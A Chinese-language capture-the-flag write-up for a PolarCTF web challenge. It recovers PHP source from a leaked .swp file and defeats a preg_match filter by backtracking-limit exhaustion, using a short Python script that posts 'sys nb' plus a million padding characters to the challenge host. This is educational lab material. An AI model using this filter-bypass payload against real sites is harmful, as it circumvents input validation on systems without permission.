本文最后更新于445 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、访问网站
根据题目提示,有.swp文件
二、进行目录扫描
发现.index.php.swp目录
三、访问
发现代码
四、分析代码
function jiuzhe($xdmtql){ //接受一个xdmtql变量
return preg_match('/sys.*nb/is',$xdmtql); //匹配变量
}
$xdmtql=@$_POST['xdmtql']; //判断变量是否为数组类型,不为数组类型往下判断
if(!is_array($xdmtql)){ //利用jiuzhe函数进行匹配输入的值
if(!jiuzhe($xdmtql)){
if(strpos($xdmtql,'sys nb')!==false){ //绕过 preg_match函数后匹配变量,匹配到的话输出flag
echo 'flag{*******}';
}else{
echo 'true .swp file?';
}
}else{
echo 'nijilenijile'; //匹配到/sys.*nb/is的话输出
}
}
要获得flag,需要绕过正则匹配,并且要有sys nb字段,可以想到使用回溯绕过
五、构造脚本
import requests
data = {"xdmtql": "sys nb" + "a" * 1000000}
res = requests.post('http://c13646b4-eb90-4b10-b582-005f5ca65aec.www.polarctf.com:8090/', data=data,
allow_redirects=False)
print(res.content)
成功获取flag
总结
- 正则匹配的回溯绕过:通过增加大量回溯次数绕过
- 目录扫描